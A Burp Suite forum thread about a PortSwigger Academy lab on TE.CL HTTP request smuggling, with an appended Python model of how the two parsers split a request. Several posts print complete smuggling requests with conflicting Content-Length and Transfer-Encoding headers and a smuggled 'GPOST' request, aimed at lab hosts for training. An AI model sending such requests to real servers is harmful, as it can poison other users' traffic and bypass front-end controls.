Burp Suite User Forum


HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

Pung | Last updated: Jun 11, 2023 03:42AM UTC

It seems that I still cannot exploit this vulnerability even though request smuggler picked it up in the scan. I have reused what the scanner used and still cannot get the desired result. I even went on to the solution to copy and paste the solution to my repeater to replicate the vulnerability and am still getting 200 back instead of the GPOST issue. Please let me know what I did wrong. Really curious.

This is the request made by the scanner which I reused in repeater. Not getting the error back.

```
POST / HTTP/1.1
Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net
Cookie: session=sKiDOv38QeI0YfqdBneTeOXoTVRqnwgA;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Content-Length: 12
Transfer-Encoding: chunked

2
0
```

This is the solution I grep from the academy. Also not getting the GPOST.

```
POST / HTTP/1.1
Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```

I have the newlines in the request already, I disabled update-content length and changed to HTTP/1.1 already. Not sure where I went wrong.

Dominyque, PortSwigger Agent | Last updated: Jun 12, 2023 12:56PM UTC

Hi,

We just tested this lab and can confirm that it works as it should. This was the request I sent:

```
POST / HTTP/1.1
Host: 0a310057037750028057e95100b4008a.web-security-academy.net
Cookie: session=nkc96G02hZ2WbH9JzD5koyPrNsC9nVko
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Connection: keep-alive

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```

Following along with the community solution video also helped.
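Added illustration, not part of either post and not PortSwigger's code: a small Python model of the two parsers involved in the request quoted in this thread, showing which bytes a `Transfer-Encoding` parser and a `Content-Length` parser each consume and why a request carrying both headers is the condition a front end should reject. The host name `lab.example` and all function names are assumptions made for the example; the request body is rebuilt with CRLF line endings.

```python
# Added example (not lab or Burp code): model how a TE-parsing front end and a
# CL-parsing back end split the same bytes. Host name below is a placeholder.
CRLF = b"\r\n"

def split_head(raw):
    head, _, body = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def chunked_end(body):
    """Offset just past the zero-size chunk, or None if the framing is malformed."""
    pos = 0
    while True:
        eol = body.find(CRLF, pos)
        if eol < 0:
            return None
        try:
            size = int(body[pos:eol].split(b";")[0], 16)   # chunk size is hex
        except ValueError:
            return None
        start = eol + 2
        end = start + size
        if body[end:end + 2] != CRLF:          # chunk data must be followed by CRLF
            return None
        if size == 0:
            return end + 2
        pos = end + 2

def analyse(raw):
    headers, body = split_head(raw)
    cl = headers.get(b"content-length")
    chunked = b"chunked" in headers.get(b"transfer-encoding", b"").lower()
    te_end = chunked_end(body) if chunked else None
    # RFC 7230 3.3.3: a message with both headers "ought to be handled as an error".
    ambiguous = cl is not None and chunked
    leftover = body[int(cl):te_end] if ambiguous and te_end is not None else b""
    return {"ambiguous": ambiguous, "te_valid": te_end is not None, "leftover": leftover}

def build(chunk_size):
    # Constructed sample: the inner block from the thread, with CRLF line endings.
    inner = (b"GPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n"
             b"Content-Length: 15\r\n\r\nx=1")
    return (b"POST / HTTP/1.1\r\nHost: lab.example\r\nContent-Length: 4\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" + chunk_size + CRLF + inner + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    print(analyse(build(b"5c")))
```

With CRLF line endings the inner block is 92 bytes (0x5c), so the chunk framing is valid and everything after the first 4 body bytes is left unread by a `Content-Length` parser; any other byte count makes the chunk size wrong and `te_valid` comes back `False`.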
